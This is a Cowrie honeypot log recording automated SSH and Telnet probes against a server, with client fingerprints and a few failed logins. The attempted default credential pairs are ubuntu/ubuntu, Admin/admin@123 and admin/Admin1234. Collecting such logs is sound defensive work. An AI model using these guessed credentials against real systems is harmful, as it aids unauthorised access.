{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T10:48:03.283501Z","src_ip":"92.118.39.95","session":"8525ae3b4e88"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-09-09T10:48:03.314033Z","src_ip":"92.118.39.95","session":"8525ae3b4e88"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"ubuntu","message":"login attempt [ubuntu/ubuntu] failed","sensor":"my-vps","timestamp":"2025-09-09T10:48:03.426610Z","src_ip":"92.118.39.95","session":"8525ae3b4e88"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:48:04.460356Z","src_ip":"92.118.39.95","session":"8525ae3b4e88"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":65528,"dst_ip":"1.2.3.4","dst_port":22,"session":"1ce91b69ee16","protocol":"ssh","message":"New connection: 217.72.205.35:65528 (1.2.3.4:22) [session: 1ce91b69ee16]","sensor":"my-vps","timestamp":"2025-09-09T10:48:09.223618Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:48:09.228338Z","src_ip":"217.72.205.35","session":"1ce91b69ee16"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52577,"dst_ip":"1.2.3.4","dst_port":23,"session":"63538c8857a4","protocol":"telnet","message":"New connection: 212.227.235.229:52577 (1.2.3.4:23) [session: 63538c8857a4]","sensor":"my-vps","timestamp":"2025-09-09T10:48:09.932363Z"}
{"eventid":"cowrie.session.connect","src_ip":"43.224.124.144","src_port":6496,"dst_ip":"1.2.3.4","dst_port":22,"session":"bdeeec19c79a","protocol":"ssh","message":"New connection: 43.224.124.144:6496 (1.2.3.4:22) [session: bdeeec19c79a]","sensor":"my-vps","timestamp":"2025-09-09T10:48:17.972976Z"}
{"eventid":"cowrie.session.closed","duration":40.97705578804016,"message":"Connection lost after 40 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:48:50.909589Z","src_ip":"212.227.235.229","session":"63538c8857a4"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:50:17.991706Z","src_ip":"43.224.124.144","session":"bdeeec19c79a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35854,"dst_ip":"1.2.3.4","dst_port":22,"session":"4cc680e5a70d","protocol":"ssh","message":"New connection: 212.227.125.160:35854 (1.2.3.4:22) [session: 4cc680e5a70d]","sensor":"my-vps","timestamp":"2025-09-09T10:51:09.636195Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T10:51:09.641040Z","src_ip":"212.227.125.160","session":"4cc680e5a70d"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-09-09T10:51:09.701197Z","src_ip":"212.227.125.160","session":"4cc680e5a70d"}
{"eventid":"cowrie.login.failed","username":"Admin","password":"admin@123","message":"login attempt [Admin/admin@123] failed","sensor":"my-vps","timestamp":"2025-09-09T10:51:09.900160Z","src_ip":"212.227.125.160","session":"4cc680e5a70d"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:51:10.963055Z","src_ip":"212.227.125.160","session":"4cc680e5a70d"}
{"eventid":"cowrie.session.connect","src_ip":"49.158.168.103","src_port":45997,"dst_ip":"1.2.3.4","dst_port":23,"session":"756c417b6e03","protocol":"telnet","message":"New connection: 49.158.168.103:45997 (1.2.3.4:23) [session: 756c417b6e03]","sensor":"my-vps","timestamp":"2025-09-09T10:53:10.242428Z"}
{"eventid":"cowrie.session.closed","duration":14.02563762664795,"message":"Connection lost after 14 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:53:24.267475Z","src_ip":"49.158.168.103","session":"756c417b6e03"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":62250,"dst_ip":"1.2.3.4","dst_port":22,"session":"91807dc29dc7","protocol":"ssh","message":"New connection: 217.72.205.35:62250 (1.2.3.4:22) [session: 91807dc29dc7]","sensor":"my-vps","timestamp":"2025-09-09T10:54:51.776415Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:54:51.783025Z","src_ip":"217.72.205.35","session":"91807dc29dc7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47538,"dst_ip":"1.2.3.4","dst_port":22,"session":"152f4f63ec2f","protocol":"ssh","message":"New connection: 212.227.235.229:47538 (1.2.3.4:22) [session: 152f4f63ec2f]","sensor":"my-vps","timestamp":"2025-09-09T10:55:18.338176Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T10:55:18.845229Z","src_ip":"212.227.235.229","session":"152f4f63ec2f"}
{"eventid":"cowrie.client.kex","hassh":"873a5fb5fedc2d4f8638ebde4abc6cfc","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha256;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-cbc,3des-cbc;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 873a5fb5fedc2d4f8638ebde4abc6cfc","sensor":"my-vps","timestamp":"2025-09-09T10:55:18.846580Z","src_ip":"212.227.235.229","session":"152f4f63ec2f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42534,"dst_ip":"1.2.3.4","dst_port":22,"session":"b7b263b7ef4c","protocol":"ssh","message":"New connection: 212.227.235.229:42534 (1.2.3.4:22) [session: b7b263b7ef4c]","sensor":"my-vps","timestamp":"2025-09-09T10:55:26.976013Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T10:55:26.979576Z","src_ip":"212.227.235.229","session":"b7b263b7ef4c"}
{"eventid":"cowrie.client.kex","hassh":"f1e5e9d24e5e345e8745613bde22d532","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f1e5e9d24e5e345e8745613bde22d532","sensor":"my-vps","timestamp":"2025-09-09T10:55:27.065963Z","src_ip":"212.227.235.229","session":"b7b263b7ef4c"}
{"eventid":"cowrie.client.fingerprint","username":"admin","fingerprint":"7f:46:35:de:8f:b8:50:41:c2:98:56:88:14:9d:de:63","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDZxIBdBc2uDlfUcLD3eebhpM44db1H6ZJ4PINimz80gBG1x+2Z6lV4ZCiBAYQQz8sKVwT21Wq6p6LmYuvlyAeJdIjLNmL6EFPmSjMxezbstMpRRKlu4oIpwYRQ3WudJQ71Zjj3P+uBNt51jIJJ56QHL0+HfD5crEkXxYd9idKsp5vs9ZocMurYrebmC6iZ7ikJti0FRTXZEG0DWM35zhEXoteBJiX2652eSv31PHS/SzBa8y9EBAGe7ozbC2Fv+6We7OT/JY98Fs4CGdmRt+QsTaE5+v4Xc97iFoKsxvyZZFUEzpB08zd6B6zcnWMB5YqO3KQ5qqGfFxkDirvNCbbJ","type":"ssh-rsa","message":"public key attempt for user admin of type ssh-rsa with fingerprint 7f:46:35:de:8f:b8:50:41:c2:98:56:88:14:9d:de:63","sensor":"my-vps","timestamp":"2025-09-09T10:55:27.245071Z","src_ip":"212.227.235.229","session":"b7b263b7ef4c"}
{"eventid":"cowrie.login.failed","username":"admin","fingerprint":"7f:46:35:de:8f:b8:50:41:c2:98:56:88:14:9d:de:63","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDZxIBdBc2uDlfUcLD3eebhpM44db1H6ZJ4PINimz80gBG1x+2Z6lV4ZCiBAYQQz8sKVwT21Wq6p6LmYuvlyAeJdIjLNmL6EFPmSjMxezbstMpRRKlu4oIpwYRQ3WudJQ71Zjj3P+uBNt51jIJJ56QHL0+HfD5crEkXxYd9idKsp5vs9ZocMurYrebmC6iZ7ikJti0FRTXZEG0DWM35zhEXoteBJiX2652eSv31PHS/SzBa8y9EBAGe7ozbC2Fv+6We7OT/JY98Fs4CGdmRt+QsTaE5+v4Xc97iFoKsxvyZZFUEzpB08zd6B6zcnWMB5YqO3KQ5qqGfFxkDirvNCbbJ","type":"ssh-rsa","message":"public key login attempt for [admin] failed","sensor":"my-vps","timestamp":"2025-09-09T10:55:27.246141Z","src_ip":"212.227.235.229","session":"b7b263b7ef4c"}
{"eventid":"cowrie.client.fingerprint","username":"admin","fingerprint":"7f:46:35:de:8f:b8:50:41:c2:98:56:88:14:9d:de:63","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDZxIBdBc2uDlfUcLD3eebhpM44db1H6ZJ4PINimz80gBG1x+2Z6lV4ZCiBAYQQz8sKVwT21Wq6p6LmYuvlyAeJdIjLNmL6EFPmSjMxezbstMpRRKlu4oIpwYRQ3WudJQ71Zjj3P+uBNt51jIJJ56QHL0+HfD5crEkXxYd9idKsp5vs9ZocMurYrebmC6iZ7ikJti0FRTXZEG0DWM35zhEXoteBJiX2652eSv31PHS/SzBa8y9EBAGe7ozbC2Fv+6We7OT/JY98Fs4CGdmRt+QsTaE5+v4Xc97iFoKsxvyZZFUEzpB08zd6B6zcnWMB5YqO3KQ5qqGfFxkDirvNCbbJ","type":"ssh-rsa","message":"public key attempt for user admin of type ssh-rsa with fingerprint 7f:46:35:de:8f:b8:50:41:c2:98:56:88:14:9d:de:63","sensor":"my-vps","timestamp":"2025-09-09T10:55:27.334930Z","src_ip":"212.227.235.229","session":"b7b263b7ef4c"}
{"eventid":"cowrie.login.failed","username":"admin","fingerprint":"7f:46:35:de:8f:b8:50:41:c2:98:56:88:14:9d:de:63","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDZxIBdBc2uDlfUcLD3eebhpM44db1H6ZJ4PINimz80gBG1x+2Z6lV4ZCiBAYQQz8sKVwT21Wq6p6LmYuvlyAeJdIjLNmL6EFPmSjMxezbstMpRRKlu4oIpwYRQ3WudJQ71Zjj3P+uBNt51jIJJ56QHL0+HfD5crEkXxYd9idKsp5vs9ZocMurYrebmC6iZ7ikJti0FRTXZEG0DWM35zhEXoteBJiX2652eSv31PHS/SzBa8y9EBAGe7ozbC2Fv+6We7OT/JY98Fs4CGdmRt+QsTaE5+v4Xc97iFoKsxvyZZFUEzpB08zd6B6zcnWMB5YqO3KQ5qqGfFxkDirvNCbbJ","type":"ssh-rsa","message":"public key login attempt for [admin] failed","sensor":"my-vps","timestamp":"2025-09-09T10:55:27.336085Z","src_ip":"212.227.235.229","session":"b7b263b7ef4c"}
{"eventid":"cowrie.session.closed","duration":"15.5","message":"Connection lost after 15.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:55:33.869073Z","src_ip":"212.227.235.229","session":"152f4f63ec2f"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:55:36.972967Z","src_ip":"212.227.235.229","session":"b7b263b7ef4c"}
{"eventid":"cowrie.session.connect","src_ip":"2.69.70.143","src_port":52755,"dst_ip":"1.2.3.4","dst_port":23,"session":"1fbde2195d9a","protocol":"telnet","message":"New connection: 2.69.70.143:52755 (1.2.3.4:23) [session: 1fbde2195d9a]","sensor":"my-vps","timestamp":"2025-09-09T10:58:25.824186Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53110,"dst_ip":"1.2.3.4","dst_port":22,"session":"28e6785211f5","protocol":"ssh","message":"New connection: 212.227.125.160:53110 (1.2.3.4:22) [session: 28e6785211f5]","sensor":"my-vps","timestamp":"2025-09-09T10:58:28.858684Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T10:58:28.863546Z","src_ip":"212.227.125.160","session":"28e6785211f5"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-09-09T10:58:28.929080Z","src_ip":"212.227.125.160","session":"28e6785211f5"}
{"eventid":"cowrie.login.failed","username":"admin","password":"Admin1234","message":"login attempt [admin/Admin1234] failed","sensor":"my-vps","timestamp":"2025-09-09T10:58:29.122252Z","src_ip":"212.227.125.160","session":"28e6785211f5"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:58:30.184633Z","src_ip":"212.227.125.160","session":"28e6785211f5"}
{"eventid":"cowrie.session.closed","duration":20.742621660232544,"message":"Connection lost after 20 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:58:46.565849Z","src_ip":"2.69.70.143","session":"1fbde2195d9a"}
{"eventid":"cowrie.session.connect","src_ip":"198.235.24.69","src_port":62594,"dst_ip":"1.2.3.4","dst_port":22,"session":"2a79135e350c","protocol":"ssh","message":"New connection: 198.235.24.69:62594 (1.2.3.4:22) [session: 2a79135e350c]","sensor":"my-vps","timestamp":"2025-09-09T11:00:23.073128Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-ZGrab ZGrab SSH Survey","message":"Remote SSH version: SSH-2.0-ZGrab ZGrab SSH Survey","sensor":"my-vps","timestamp":"2025-09-09T11:00:41.865965Z","src_ip":"198.235.24.69","session":"2a79135e350c"}
{"eventid":"cowrie.session.closed","duration":"22.0","message":"Connection lost after 22.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T11:01:02.945155Z","src_ip":"198.235.24.69","session":"2a79135e350c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54259,"dst_ip":"1.2.3.4","dst_port":22,"session":"da180262042d","protocol":"ssh","message":"New connection: 212.227.235.229:54259 (1.2.3.4:22) [session: da180262042d]","sensor":"my-vps","timestamp":"2025-09-09T11:01:21.859137Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54654,"dst_ip":"1.2.3.4","dst_port":22,"session":"c6067c909ce0","protocol":"ssh","message":"New connection: 212.227.235.229:54654 (1.2.3.4:22) [session: c6067c909ce0]","sensor":"my-vps","timestamp":"2025-09-09T11:01:44.393433Z"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":50254,"dst_ip":"1.2.3.4","dst_port":22,"session":"ae2cbfaf2960","protocol":"ssh","message":"New connection: 217.72.205.35:50254 (1.2.3.4:22) [session: ae2cbfaf2960]","sensor":"my-vps","timestamp":"2025-09-09T11:02:08.852236Z"}
{"eventid":"cowrie.session.closed","duration":"55.9","message":"Connection lost after 55.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T11:02:40.743376Z","src_ip":"212.227.235.229","session":"da180262042d"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T11:03:14.084978Z","src_ip":"212.227.235.229","session":"c6067c909ce0"}
{"eventid":"cowrie.session.closed","duration":"91.0","message":"Connection lost after 91.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T11:03:37.826594Z","src_ip":"212.227.235.229","session":"c6067c909ce0"}
{"eventid":"cowrie.session.closed","duration":"97.4","message":"Connection lost after 97.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T11:04:05.168378Z","src_ip":"217.72.205.35","session":"ae2cbfaf2960"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36206,"dst_ip":"1.2.3.4","dst_port":22,"session":"f7b78c93a603","protocol":"ssh","message":"New connection: 212.227.125.160:36206 (1.2.3.4:22) [session: f7b78c93a603]","sensor":"my-vps","timestamp":"2025-09-09T11:05:49.972854Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T11:06:18.051455Z","src_ip":"212.227.125.160","session":"f7b78c93a603"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55651,"dst_ip":"1.2.3.4","dst_port":23,"session":"7ac9adb399be","protocol":"telnet","message":"New connection: 212.227.125.160:55651 (1.2.3.4:23) [session: 7ac9adb399be]","sensor":"my-vps","timestamp":"2025-09-09T11:06:47.074682Z"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-09-09T11:08:05.627750Z","src_ip":"212.227.125.160","session":"f7b78c93a603"}
{"eventid":"cowrie.session.closed","duration":248.99041318893433,"message":"Connection lost after 248 seconds","sensor":"my-vps","timestamp":"2025-09-09T11:10:55.265016Z","src_ip":"212.227.125.160","session":"7ac9adb399be"}
{"eventid":"cowrie.session.closed","duration":"363.2","message":"Connection lost after 363.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T11:12:21.037198Z","src_ip":"212.227.125.160","session":"f7b78c93a603"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":58366,"dst_ip":"1.2.3.4","dst_port":22,"session":"adc1d555a5c8","protocol":"ssh","message":"New connection: 217.72.205.35:58366 (1.2.3.4:22) [session: adc1d555a5c8]","sensor":"my-vps","timestamp":"2025-09-09T11:13:16.457326Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":3948,"dst_ip":"1.2.3.4","dst_port":22,"session":"9763b3e9f1db","protocol":"ssh","message":"New connection: 212.227.125.160:3948 (1.2.3.4:22) [session: 9763b3e9f1db]","sensor":"my-vps","timestamp":"2025-09-09T11:14:36.157676Z"}
